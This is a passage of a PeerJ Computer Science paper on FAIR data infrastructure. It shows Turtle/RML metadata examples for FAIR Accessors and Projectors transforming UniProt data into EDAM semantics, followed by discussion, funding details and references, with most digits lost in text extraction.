https://peerj.com http://dx.doi.org/ . /peerj-cs. @prefix dc: <http://purl.org/dc/elements/ . />. @prefix dcat: <http://www.w .org/ns/dcat#>. @prefix rr: <http://www.w .org/ns/r rml#>. @prefix ql: <http://semweb.mmlab.be/ns/ql#>. @prefix rml: <http://semweb.mmlab.be/ns/rml#>. @prefix uni: <http://linkeddata.systems/accessors/uniprotaccessor//>. @prefix void: <http://rdfs.org/ns/void#>. @prefix uni: </cgi-bin/accessors/uniprotaccessor/>. @prefix fai: <http://datafairport.org/ontology/fair-schema.owl#>. @prefix core: <http://purl.uniprot.org/core/>. @prefix edam: <http://edamontology.org/>. uni:c v l dcat:distribution <#distribution efd -c f - e - - e d c dd>, <#distribution efd -c f - e - - e d c dd> dc:format "application/rdf+xml", "application/x-turtle", "text/html"; rml:hasmapping <#mappings efd -c f - e - - e d c dd>; a fai:projector, dc:dataset, void:dataset, dcat:distribution; dcat:downloadurl <http://linkeddata.systems: /fragments?subject=http% a% f% fidentifiers% eorg % funiprot% fc v l &predicate=http% a% f% fpurl% euniprot% eorg% fcore% fclassified with>. <#mappings efd -c f - e - - e d c dd> rr:subjectmap <#subjectmap efd -c f - e - - e d c dd>. rr:predicateobjectmap <#pomap efd -c f - e - - e d c dd>; <#subjectmap efd -c f - e - - e d c dd> rr:class edam:data_ ; rr:template "http://identifiers.org/uniprot/{id}". <#pomap efd -c f - e - - e d c dd> rr:objectmap <#objectmap efd -c f - e - - e d c dd>; rr:predicate core:classifiedwith. <#objectmap efd -c f - e - - e d c dd> rr:parenttriplesmap <#subjectmap efd -c f - e - - e d c dd>. <#subjectmap efd -c f - e - - e d c dd> rr:class ed:data_ ; rr:template "http://identifiers.org/taxon/{tax}". figure turtle representation of the subset of triples from the metarecord metadata pertaining to one of the fair projector dcat distributions of the metarecord shown in fig. . the text is colour- coded to assist in visual exploration of the rdf. the dcat distribution blocks of the two projector dis- tributions (black bold) have multiple media-type representations (red), and are connected to an rml map (dark blue) by the hasmapping predicate, which is a block of rml that semantically describes the subject, predicate, and object (green, orange, and purple respectively) of the triple descriptor for that projector. this block of rml is schematically diagrammed in fig. . the three media-types (red) indicate that the url will respond to http content negotiation, and may return any of those three formats. wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in uniprot http://purl.uniprot.org/uniprot/c uzx a http://purl.uniprot.org/core/protein ; http://purl.uniprot.org/core/classifiedwith http://purl.obolibrary.org/obo/go_ . http://purl.obolibrary.org/obo/go_ a http://www.w .org/ / /owl#class after projection http://identifiers.org/uniprot/c uzx a http://edamontology.org/data_ ; http://purl.uniprot.org/core/classifiedwith http://purl.obolibrary.org/obo/go_ . http://purl.obolibrary.org/obo/go_ a http://edamontology.org/data_ figure data before and after fair projection. bolded segments show how the uri structure and the semantics of the data were modified, according to the mapping defined in the triple descriptor (data_ = ‘‘protein report’’ and data_ = ‘‘go concept id’’). uri structure transformations may be useful for integrative queries against datasets that utilize the identifiers.org uri scheme such as openlifedata (gonzález et al., ). semantic transformations allow integrative queries across datasets that utilize diverse and redundant ontologies for describing their data, and in this example, may also be used to add semantics where there were none before. that this information could be contained in a separate named graph, in a manner akin to that used by nanopublications (kuhn et al., ). the important distinctive property in this document is the ‘‘distribution’’ property, from the dcat ontology. for clarity, an abbreviated document in turtle format is shown in fig. , containing only the ‘‘distribution’’ elements and their values. there are two dcat distributions in this document. the first is described as being in format ‘‘application/rdf+xml’’, with its associated download url. the second is described as being in format ‘‘text/html’’, again with the correct url for that representation. both are typed as distributions from the dcat ontology. these distributions are published by uniprot themselves, and the uniprot urls are used. additional metadata in the fair accessor (not shown in fig. ) describes the keywords that relate to that record in both machine and human-readable formats, access policy, and license, allowing machines to more accurately determine the utility of this record prior to retrieving it. several things are important to note before moving to a discussion of fair projectors. first, the two levels of the fair accessor are not interdependent. the container layer can describe relevant information about the scope and nature of a repository, but might not provide any further links to metarecords. similarly, whether or not to provide a distribution within a metarecord is entirely at the discretion of the data owner. for sensitive data, an owner may chose to simply provide (even limited) metadata, but not provide any direct link to the data itself, and this is perfectly conformant with the fair guidelines. further, when publishing a single data record, it is not obligatory to publish the wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. container level of the fair accessor; one could simply provide the metarecord document describing that data file, together with an optional link to that file as a distribution. finally, it is also possible to publish containers of containers, to any depth, if such is required to describe a multi-resource scenario (e.g., an institution hosting multiple distinct databases). the fair projector fair projectors can be used for many purposes, including (but not limited to) publishing transformed linked data from non-linked data; publishing transformed data from a linked data source into a distinct structure or ontological framework; load-management/query-management; or as a means to explicitly describe the ontological structure of an underlying data source in a searchable manner. in this demonstration, the fair projector publishes dynamically transformed data, where the transformation involves altering the semantics of rdf provided by uniprot into a different ontological framework (edam). this fair projector’s tpf interface is available at: http://linkeddata.systems: /fragments data exposed as a tpf-compliant resource require a subject and/or predicate and/or object value to be specified in the url; a request for the all-variable pattern (blank, as above) will return nothing. how can a software agent know what urls are valid, and what will be returned from such a request? in this interoperability infrastructure, we propose that projectors should be considered as dcat distributions, and thus tpf urls, with appropriate parameters bound, are included in the distribution section of the metarecord metadata. an example is shown in fig. , again rendered using tabulator. note that there are now four distributions—two of them are the html and rdf distributions discussed above (fig. ). the two new distributions are those provided by a fair projector. again, looking at an abbreviated and simplified turtle document for clarity (fig. ) we can see the metadata structure of one of these two new distributions. following the triple pattern fragments behaviour, requesting the downloadurl with http get will trigger the projector to restrict its output to only those data from uniprot where the subject is uniprot record c v l , and the property of interest is ‘‘classifiedwith’’ from the uniprot core ontology. the triples returned in response to this call, however, will not match the native semantics of uniprot, but rather will match the semantics and structure defined in the rml mappings block. the schematic structure of this mapping rml is diagrammed in fig. . the mappings describes a triple where the subject will be of type edam:data_ (‘‘protein record’’), the predicate will be ‘‘classifiedwith’’ from the uniprot core ontology, and the object will be of type edam:data_ (‘‘go concept id’’). specifically, the triples returned are: @prefix uni: <http://identifiers.org/uniprot/>. @prefix obo: <http://purl.obolibrary.org/obo/>. uni:c v l core:classifiedwith obo:go_ , obo:go_ . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this is accompanied by a block of hypermedia controls (not shown) using the hydra vocabulary (lanthaler & gütl, ; das, sundara & cyganiak, ) that provide machine- readable instructions for how to navigate the remainder of that dataset—for example, how to get the entire row, or the entire column for the current data-point. though the subject and object are not explicitly typed in the output from this call to the projector, further exploration of the projector’s output, via those tpf’s hypermedia controls, would reveal that the subject and object are in fact typed according to the edam ontology, as declared in the rml mapping. thus, this fair projector served data transformed from uniprot core semantic types, to the equivalent data represented within the edam semantic framework, as shown in fig. . also note that the uri structure for the uniprot entity has been changed from the uniprot uri scheme to a uri following the identifiers.org scheme. the fair projector, in this case, is a script that dynamically transforms data from a query of uniprot into the appropriately formatted triples; however, this is opaque to the client. the projector’s tpf interface, from the perspective of the client, would be identical if the projector was serving pre-transformed data from a static document, or even generating novel data from an analytical service. thus, fair projectors harmonize the interface to retrieving rdf data in a desired semantic/structure, regardless of the underlying mechanism for generating that data. this example was chosen for a number of reasons. first, to contrast with the static zenodo example provided earlier, where this accessor/projector combination are querying the uniprot database dynamically. in addition, because we wished to demonstrate the utility of the projector’s ability to transform the semantic framework of existing fair data in a discoverable way. for example, in uniprot, gene ontology terms do not have a richer semantic classification than ‘‘owl:class’’. with respect to interoperability, this is problematic, as the lack of rich semantic typing prevents them from being used for automated discovery of resources that could potentially consume them, or use them for integrative, cross-domain queries. this fair accessor/projector advertises that it is possible to obtain edam-classified data, from uniprot, simply by resolving the projector url. discussion interoperability is hard. it was immediately evident that, of the four fair principles, interoperability was going to be the most challenging. here we have designed a novel infrastructure with the primary objective of interoperability for both metadata and data, but with an eye to all four of the fair principles. we wished to provide discoverable and interoperable access to a wide range of underlying data sources—even those in computationally opaque formats—as well as supporting a wide array of both academic and commercial end-user applications above these data sources. in addition, we imposed constraints on our selection of technologies; in particular, that the implementation should re-use existing technologies as much as possible, and should support multiple and unpredictable end-uses. moreover, it was accepted from the outset that the trade-off between simplicity and power was one that could not be avoided, since a key objective was wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to maximize uptake over the broadest range of data repositories, spanning all domains— this would be nearly impossible to achieve through, for example, attempting to impose a ‘universal’ api or novel query language. thus, with the goal of maximizing global uptake and adoption of this interoperability infrastructure, and democratizing the cost of implementation over the entire stakeholder community—both users and providers—we opted for lightweight, weakly integrative, rest solutions, that nevertheless lend themselves to significant degrees of mechanization in both discovery and integration. we now look more closely at how this interoperability infrastructure meets the expectations within the fair principles. fair facet(s) addressed by the container resource: • findable—the container has a distinct globally unique and resolvable identifier, allowing it to be discovered and explicitly, unambiguously cited. this is important because, in many cases, the dataset being described does not natively possess an identifier, as in our example above where the dataset represented the results of a query. in addition, the container’s metadata describes the research object, allowing humans and machines to evaluate the potential utility of that object for their task. • accessible—the container url resolves to a metadata record using standard http get. in addition to describing the nature of the research object, the metadata record should include information regarding licensing, access restrictions, and/or the access protocol for the research object. importantly, the container metadata exists independently of the research object it describes, where fair accessibility requires metadata to be persistently available even if the data itself is not. • interoperable—the metadata is provided in rdf—a globally-applicable syntax for data and knowledge sharing. in addition, the metadata uses shared, widely-adopted public ontologies and vocabularies to facilitate interoperability at the metadata level. • reusable—the metadata includes citation information related to the authorship of the container and/or its contents, and license information related to the reuse of the data, by whom, and for what purpose. other features of the container resource • privacy protection—the container metadata provides access to a rich description of the content of a resource, without exposing any data within that resource. while a provider may choose to include metarecord urls within this container, they are not required to do so if, for example, the data is highly sensitive, or no longer easily accessible; however, the contact information provided within the container allows potential users of that data to inquire as to the possibility of gaining access in some other way. as such, this container facilitates a high degree of fairness, while still providing a high degree of privacy protection. fair facet(s) addressed by the metarecord: • findable—the metarecord url is a globally-unique and resolvable identifier for a data entity, regardless of whether or not it natively possesses an identifier. the wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. metadata it resolves to allows both humans and machines to interrogate the nature of a data element before deciding to access it. • accessible—the metadata provided by accessing the metarecord url describes the accessibility protocol and license information for that record, and describes all available formats. • interoperable—as with the container metadata, the use of shared ontologies and rdf ensures that the metadata is interoperable. • reusable—the metarecord metadata should carry record-level citation information to ensure proper attribution if the data is used. we further propose, but do not demonstrate, that authorship of the metarecord itself could be carried in a second named-graph, in a manner similar to that proposed by the nanopublication specification. other features of the metarecord • privacy protection—the metarecord provides for rich descriptive information about a specific member of a collection, where the granularity of that description is entirely under the control of the data owner. as such, the metarecord can provide a high degree of fairness at the level of an individual record, without necessarily exposing any identifiable information. in addition, the provider may choose to stop at this level of fairness, and not include further urls giving access to the data itself. • symmetry of traversal—since we predict that clients will, in the future, query over indexes of fair metadata searching for dataset or records of interest, it is not possible to predict the position at which a client or their agent will enter your fair accessor. while the container metadata provides links to individual metarecords, the metarecord similarly provides a reference back ‘‘upwards’’ to its container. thus a client can access repository-level metadata (e.g., curation policy, ownership, linking policy) for any given data element it discovers. this became particularly relevant as a result of the european court of justice decision (court of justice of the european union, ) that puts the burden of proof on those who create hyperlinks to ensure the document they link to is not, itself, in violation of copyright. • high granularity of access control—individual elements of a collection may have distinct access constraints or licenses. for example, individual patients within a study may have provided different consent. metarecords allow each element within a collection to possess, and publish, its own access policy, access protocol, license, and/or usage-constraints, thus providing fine-grained control of the access/use of individual elements within a repository. fair facet(s) addressed by the triple descriptors and fair projectors: • findable—triple descriptors, in isolation or when aggregated into fair profiles, provide one or more semantic interpretations of data elements. by indexing these descriptors, it would become possible to search over datasets for those that contain data-types of interest. moreover, fair projectors, as a result of the tpf uri structure, create a unique url for every data-point within a record. this has striking wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. consequences with respect to scholarly communication. for example, it becomes possible to unambiguously refer-to, and therefore ‘‘discuss’’ and/or annotate, individual spreadsheet cells from any data repository. • accessible—using the tpf design patterns, all data retrieval is accomplished in exactly the same way—via http get. the response includes machine-readable instructions that guide further exploration of the data without the need to define an api. fair projectors also give the data owner high granularity access control; rather than publishing their entire dataset, they can select to publish only certain components of that dataset, and/or can put different access controls on different data elements, for example, down to the level of an individual spreadsheet cell. • interoperable—fair projectors provide a standardized way to export any type of underlying data in a machine-readable structure, using widely used, public shared vocabularies. data linkages that were initially implicit in the datastore, identifiers for example, become explicit when converted into uris, resulting in qualified linkages between formerly opaque data deposits. similarly, data that resides within computationally opaque structures or formats can also be exposed, and published in a fair manner if there is an algorithm capable of extracting it and exposing it via the tpf interface. • reusable—all data points now possess unique identifiers, which allows them to be explicitly connected to their citation and license information (i.e., the metarecord). in this way, every data point, even when encountered in isolation, provides a path to trace-back to its reusability metadata. other features of fair projection • native formats are preserved—as in many research domains, bioinformatics has created a large number of data/file formats. many of these, especially those that hold ‘‘big data’’, are specially formatted flat-files that focus on size-efficient representation of data, at the expense of general machine-accessibility. the analytical tooling that exists in this domain is capable of consuming these various formats. while the fair data community has never advocated for wholesale interoperable representations of these kinds of data—which would be inefficient, wasteful, and lacking in utility—the fair projector provides a middle-ground. projection allows software to query the core content of a file in a repository prior to downloading it; for example, to determine if it contains data about an entity or identifier of interest. fair projectors, therefore, enable efficient discovery of data of-interest, without requiring wasteful transformation of all data content into a fair format. • semantic conversion of existing triplestores—it is customary to re-cast the semantic types of entities within triplestores using customized sparql bind or construct clauses. fair projectors provide a standardized, sparql-free, and discoverable way to accomplish the same task. this further harmonizes data, and simplifies interoperability. • standardized interface to (some) web apis—many web apis in the biomedical domain have a single input parameter, generally representing an identifier for wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. some biochemical entity. fair projectors can easily replace these myriad web apis with a common tpf interface, thus dramatically enhancing discoverability, machine-readability, and interoperability between these currently widely disparate services. incentives and barriers to implementation looking forward, there is every indication that fairness will soon be a requirement of funding agencies and/or journals. as such, infrastructures such as the one described in this exemplar will almost certainly become a natural part of scholarly data publishing in the future. though the fair infrastructure proposed here may appear difficult to achieve, we argue that a large portion of these behaviours—for example, the first two layers of the accessor—can be accomplished using simple fill-in-the-blank templates. such templating tools are, in fact, already being created by several of the co-authors, and will be tested on the biomedical data publishing community in the near future to ensure they are clear and usable by this key target-audience. projection, however, is clearly a complex undertaking, and one that is unlikely to be accomplished by non-informaticians on their own. transformation from unstructured or semi-structured formats into interoperable formats cannot be fully automated, and we do not claim to have fully solved the interoperability bottleneck. we do, however, claim to have created an infrastructure that improves on the status quo in two ways: first, we propose to replace the wasteful, one-off, ‘‘reuseless’’ data transformation activities currently undertaken on a daily basis throughout the biomedical community (and beyond), with a common, reusable, and machine-readable approach, by suggesting that all data transformations should be described in rml and transformed data exposed using tpf. second, the solution we propose may, in many cases, partially automate the data transformation process itself. rml can be used, in combination with generic software such as rml processor (http://github.com/rmlio) to actuate a data transformation over many common file formats such as csv or xml. as such, by focusing on building rml models, in lieu of reuseless data transformation scripts, data publishers achieve both the desired data transformation, as well as a machine-readable interface that provides that transformed data to all other users. this may be incentivized even more by creating repositories of rml models that can be reused by those needing to do data transformations. though the infrastructure for capturing these user-driven transformation events and formalizing them into fair projectors does not yet exist, it does not appear on its surface to be a complex problem. thus, we expect that such infrastructure should appear soon after fairness becomes a scholarly publishing requirement, and early prototypes of these infrastructures are being built by our co-authors. several communities of data providers are already planning to use this, or related fair implementations, to assist their communities to find, access, and reuse their valuable data holdings. for example, the biobanking and rare disease communities will be given end-user tools that utilize/generate such fair infrastructures to: guide discovery by researchers; help both biobankers and researchers to re-code their data to standard ontologies building on the sorta system (pang et al., ); assist to extend the molgenis/biobankconnect system wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://github.com/rmlio http://dx.doi.org/ . /peerj-cs. (pang et al., ); add fair interfaces to the bbmri (biobanking and biomolecular resources research infrastructure) and rd-connect national and european biobank data and sample catalogues. there are also a core group of fair infrastructure authors who are creating large-scale indexing and discovery systems that will facilitate the automated identification and retrieval of relevant information, from any repository, in response to end-user queries, portending a day when currently unused—‘‘lost’’—data deposits once again provide return-on-investment through their discovery and reuse. conclusions there is a growing movement of governing bodies and funding organizations towards a requirement for open data publishing, following the fair principles. it is, therefore, useful to have an exemplar ‘‘reference implementation’’ that demonstrates the kinds of behaviours that are expected from fair resources. of the four fair principles, interoperability is arguably the most difficult fair facet to achieve, and has been the topic of decades of informatics research. several new standards and frameworks have appeared in recent months that addressed various aspects of the interoperability problem. here, we apply these in a novel combination, and show that the result is capable of providing interoperability between formerly incompatible data formats published anywhere on the web. in addition, we note that the other three aspects of fair—findability, accessibility, and reusability—are easily addressed by the resulting infrastructure. the outcome, therefore, provides machine-discoverable access to richly described data resources in any format, in any repository, with the possibility of interoperability of the contained data down to the level of an individual ‘‘cell’’. no new standards or apis were required; rather, we rely on rest behaviour, with all entities being resources with a resolvable identifier that allow hypermedia-driven ‘‘drill-down’’ from the level of a repository descriptor, all the way to an individual data point in the record. such an interoperability layer may be created and published by anyone, for any data source, without necessitating an interaction with the data owner. moreover, the majority of the interoperability layer we describe may be achieved through dynamically generated files from software, or even (for the accessor portion) through static, manually-edited files deposited in any public repository. as such, knowledge of how to build or deploy web infrastructure is not required to achieve a large portion of these fair behaviours. the trade-off between power and simplicity was considered acceptable, as a means to hopefully encourage wide adoption. the modularity of the solution was also important because, in a manner akin to crowdsourcing, we anticipate that the implementation will spread through the community on a needs-driven basis, with the most critical resource components being targeted early—the result of individual researchers requiring interoperable access to datasets/subsets of interest to them. the interoperability design patterns presented here provide a structured way for these individuals to contribute and share their individual effort—effort they would have invested anyway—in a collaborative manner, piece-by-piece building a much larger interoperable and fair data infrastructure to benefit the global community. wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements in january the lorentz center hosted the ‘jointly designing a data fairport’ workshop. this workshop was organized by barend mons in collaboration with and co-sponsored by the lorentz center, the dutch techcentre for life sciences/elixir-nl and the netherlands escience center. the workshop led to the formalization of fair principles and subsequently to the formation of a fair skunkworks team and a fair data engineering team. we thank barend mons for critical discussions leading up to this article. we would also like to thank the uniprot rdf and sparql team at the swiss-prot group of the sib swiss institute of bioinformatics for their advice and assistance. we would like to acknowledge the advice and feedback from the leaders and participants of biohackathon , hosted by the integrated database project (ministry of education, culture, sports science and technology, japan), the national bioscience database center (nbdc—japan), and the database center for life sciences (dbcls—japan). additional information and declarations funding the lead author is supported by the fundacion bbva + upm isaac peral programme, and the spanish ministerio de economía y competitividad grant number tin - - r. additional support for fair skunkworks members comes from european union funded projects elixir-excelerate (h no. ), adopt bbmri-eric (h no. ) and corbel (h no. ). portions of this work have been funded by netherlands organisation for scientific research (odex all project), stichting topconsortium voor kennis en innovatie high tech systemen en materialen (fairdict project), bbmri-nl, rd-connect and elixir (rare disease implementation study fp no. ). uniprot is mainly supported by the national institutes of health (nih), national human genome research institute (nhgri) and national institute of general medical sciences (nigms) grant u hg . swiss-prot activities at the sib are supported by the swiss federal government through the state secretariat for education, research and innovation seri. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: fundacion bbva + upm isaac peral programme. spanish ministerio de economía y competitividad: tin - -r. european union funded projects elixir-excelerate: h no. . adopt bbmri-eric: h no. . corbel: h no. . netherlands organisation for scientific research. fairdict project. wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. national institutes of health (nih). national human genome research institute (nhgri). national institute of general medical sciences (nigms): u hg . swiss federal government. competing interests the authors declare there are no competing interests. author contributions • mark d. wilkinson conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • ruben verborgh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • luiz olavo bonino da silva santos, fleur d.l. kelpin, arnold kuzniar and anand gavai conceived and designed the experiments, analyzed the data, reviewed drafts of the paper. • tim clark, alasdair j.g. gray, erik m. van mulligen and paolo ciccarese conceived and designed the experiments, reviewed drafts of the paper. • morris a. swertz, erik a. schultes, mark thompson and rajaram kaliyaperumal conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • jerven t. bolleman analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper, fixed the demonstrative query, clarified the semantics of uniprot, corrected erroneous ontological annotations;. • michel dumontier conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the manuscript describes a set of practices and behaviors that combine third-party technologies and standards in a novel manner. this does not (necessarily) require novel, dedicated software, and therefore a repository is not provided. the paper uses only public data for its demonstration, and the query to retrieve that data from-source is provided in the manuscript text (the curator of that data is uniprot, the data is being used/republished with their explicit permission, and a member of their team is a co-author on the manuscript). references bechhofer s, buchan i, de roure d, missier p, ainsworth j, bhagat j, couch p, cruick- shank d, delderfield m, dunlop i, gamble m, michaelides d, owen s, newman d, sufi s, goble c. . why linked data is not enough for scientists. future generations computer systems: fgcs : – doi . /j.future. . . . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. berners-lee t. . linked data. available at https://www.w .org/designissues/ linkeddata.html (accessed on september ). berners-lee t, chen y, chilton l, connolly d, dhanaraj r, hollenbach j, lerer a, sheets d. . tabulator: exploring and analyzing linked data on the semantic web. in: proceedings of the rd international semantic web user interaction workshop. ciccarese p, soiland-reyes s, belhajjame k, gray aj, goble c, clark t. . pav ontology: provenance, authoring and versioning. journal of biomedical semantics : doi . / - - - . cook ce, bergman mt, finn rd, cochrane g, birney e, apweiler r. . the european bioinformatics institute in : data growth and integration. nucleic acids research :d –d doi . /nar/gkv . court of justice of the european union. . press release no / . available at http://curia.europa.eu/jcms/upload/docs/application/pdf/ - /cp en.pdf (accessed on december ). covitz pa, hartel f, schaefer c, coronado s, fragoso g, sahni h, gustafson s, buetow kh. . cacore: a common infrastructure for cancer informatics. bioinformatics : – doi . /bioinformatics/btg . crosswell lc, thornton jm. . elixir: a distributed infrastructure for european bi- ological data. trends in biotechnology : – doi . /j.tibtech. . . . das s, sundara s, cyganiak r. . r rml: rdb to rdf mapping language. w c recommendation. available at https://www.w .org/tr/r rml/ . de giovanni r, copp c, döring m, hobern d. . tapir—tdwg access protocol for information retrieval. tswg standards. available at http://www.tdwg.org/ standards/ . dimou a, vander sande m, colpaert p, verborgh r, mannens e, van de walle r. . rml: a generic language for integrated rdf mappings of heterogeneous data. in: proceedings of the th workshop on linked data on the web, vol. , ceur workshop proceedings. dumontier m, gray ajg, marshall ms, alexiev v, ansell p, bader g, baran j, bolleman jt, callahan a, cruz-toledo j, gaudet p, gombocz ea, gonzalez-beltran an, groth p, haendel m, ito m, jupp s, juty n, katayama t, kobayashi n, krish- naswami k, laibe c, novère n, lin s, malone j, miller m, mungall cj, rietveld l, wimalaratne sm, yamaguchi a. . the health care and life sciences community profile for dataset descriptions. peerj :e doi . /peerj. . fallside dc, walmsley p. . xml schema part —primer second edition. available at https://www.w .org/tr/xmlschema- / (accessed on december ). fielding rt, taylor rn. . principled design of the modern web architecture. acm transactions on internet technology : – doi . / . . gessler ddg, schiltz gs, may gd, avraham s, town cd, grant d, nelson rt. . sswap: a simple semantic web architecture and protocol for semantic web services. bmc bioinformatics : doi . / - - - . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/designissues/linkeddata.html https://www.w .org/designissues/linkeddata.html http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nar/gkv http://curia.europa.eu/jcms/upload/docs/application/pdf/ - /cp en.pdf http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /j.tibtech. . . https://www.w .org/tr/r rml/ http://www.tdwg.org/standards/ http://www.tdwg.org/standards/ http://dx.doi.org/ . /peerj. https://www.w .org/tr/xmlschema- / http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. gonzález ar, callahan a, cruz-toledo j, garcia a, aranguren m, dumontier m, wilkinson md. . automatically exposing openlifedata via sadi semantic web services. journal of biomedical semantics : doi . / - - - . gray ajg, baran j, marshall ms, dumontier m. . dataset descriptions: hcls community profile. interest group note, w c (may ). available at http://www. w org/tr/hcls-dataset. heery r, patel m. . application profiles: mixing and matching metadata schemas. ariadne issue . september , . available at http://www.ariadne.ac.uk/issue / app-profiles/ . ison j, kalas m, jonassen i, bolser d, uludag m, mcwilliam h, malone j, lopez r, pettifer s, rice p. . edam: an ontology of bioinformatics operations, types of data and identifiers, topics and formats. bioinformatics : – doi . /bioinformatics/btt . kuhn t, tobias k, christine c, michael k, núria q-r, ruben v, george g, ngomo a- cn, raffaele v, michel d. . decentralized provenance-aware publishing with nanopublications. peerj computer science :e doi . /peerj-cs. . lanthaler m, gütl c. . hydra: a vocabulary for hypermedia-driven web apis. in: proceedings of the th workshop on linked data on the web (ldow ), may , , rio de janeiro, brazil. available at http://ceur-ws.org/vol- /papers/ ldow -paper- .pdf . maali f, erickson j, archer p. . data catalog vocabulary (dcat). w c recom- mendation. available at https://www.w .org/tr/vocab-dcat/ . martin d, paolucci m, mcilraith s, burstein m, mcdermott d, mcguinness d, parsia b, payne t, sabou m, solanki m, srinivasan n, sycara k. . bringing semantics to web services: the owl-s approach. in: semantic web services and web process composition: first international workshop, swswpc , san diego, ca, usa, july , , revised selected papers. springer berlin heidelberg, – . martin d, paolucci m, wagner m. . towards semantic annotations of web services: owl-s from the sawsdl perspective. in: proceedings of the owl-s experiences and future developments workshop at eswc. available at https://static.aminer.org/pdf/ pdf/ / / /grounding_owl_s_in_wsdl_s.pdf . miles a, bechhofer s. . skos simple knowledge organization system reference. w c recommendation. available at https://www.w .org/tr/skos-reference/ . pang c, van enckevort d, de haan m, kelpin f, jetten j, hendriksen d, de boer t, charbon b, winder e, van der velde kj, doiron d, fortier i, hillege h, swertz ma. . molgenis/connect: a system for semi-automatic integration of heterogeneous phenotype data with applications in biobanks. bioinformatics : – doi . /bioinformatics/btw . pang c, sollie a, sijtsma a, hendriksen d, charbon b, de haan m, de boer t, kelpin f, jetten j, van der velde jk, smidt n, sijmons r, hillege h, swertz ma. . sorta: a system for ontology-based re-coding and technical annotation of biomedical phenotype data. database :bav doi . /database/bav . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - http://www.w org/tr/hcls-dataset http://www.w org/tr/hcls-dataset http://www.ariadne.ac.uk/issue /app-profiles/ http://www.ariadne.ac.uk/issue /app-profiles/ http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . /peerj-cs. http://ceur-ws.org/vol- /papers/ldow -paper- .pdf http://ceur-ws.org/vol- /papers/ldow -paper- .pdf https://www.w .org/tr/vocab-dcat/ https://static.aminer.org/pdf/pdf/ / / /grounding_owl_s_in_wsdl_s.pdf https://static.aminer.org/pdf/pdf/ / / /grounding_owl_s_in_wsdl_s.pdf https://www.w .org/tr/skos-reference/ http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /database/bav http://dx.doi.org/ . /peerj-cs. roche dg, kruuk leb, lanfear r, binning sa. . public data archiving in ecology and evolution: how well are we doing? plos biology :e doi . /journal.pbio. . rodriguez iglesias, alejandro, marconi, marco, sesma, ane, wilkinson, mark. . rdf representation of rna metabolism evolution data—version (diagrammed in https://zenodo.org/deposit/ /) [data set]. zenodo. doi . /zenodo. . sib swiss institute of bioinformatics members. . the sib swiss institute of bioinformatics’ resources: focus on curated databases. nucleic acids research :d –d doi . /nar/gkv . speicher s, arwe j, malhotra a. . linked data platform . . w c recommenda- tion. available at https://www.w .org/tr/ldp/ . starr j, castro e, crosas m, dumontier m, downs rr, duerr r, haak ll, haendel m, herman i, hodson s, hourclé j, kratz je, lin j, nielsen lh, nurnberger a, proell s, rauber a, sacchi s, smith a, taylor m, clark t. . achieving human and machine accessibility of cited data in scholarly publications. peerj computer science :e doi . /peerj-cs. . stein ld, knoppers bm, campbell p, getz g, korbel jo. . data analysis: create a cloud commons. nature : – doi . / a. stevens rd, robinson aj, goble ca. . mygrid: personalised bioinformatics on the information grid. bioinformatics (suppl ):i –i doi . /bioinformatics/btg . thompson r, johnston l, taruscio d, monaco l, béroud c, gut ig, hansson mg, ’t hoen p-ba, patrinos gp, dawkins h, ensini m, zatloukal k, koubi d, heslop e, paschall je, posada m, robinson pn, bushby k, lochmüller h. . rd- connect: an integrated platform connecting databases, registries, biobanks and clinical bioinformatics for rare disease research. journal of general internal medicine (suppl ):s –s doi . /s - - - . van ommen g-jb, törnwall o, bréchot c, dagher g, galli j, hveem k, landegren u, luchinat c, metspalu a, nilsson c, solesvik ov, perola m, litton j-e, zatloukal k. . bbmri-eric as a resource for pharmaceutical and life science industries: the development of biobank-based expert centres. european journal of human genetics: ejhg : – doi . /ejhg. . . verborgh r, dumontier m. . a web api ecosystem through feature-based reuse. arxiv preprint. arxiv: . . verborgh r, ruben v, sande mv, olaf h, van herwegen j, de vocht l, de meester b, gerald h, pieter c. . triple pattern fragments: a low-cost knowledge graph interface for the web. web semantics: science, services and agents on the world wide web – : – . w c. . data catalog vocabulary (dcat). available at http://www.w .org/tr/ vocab-dcat (accessed on december ). wilkinson md, dumontier m, aalbersberg ijj, appleton g, axton m, baak a, blomberg n, boiten j-w, da silva santos lb, 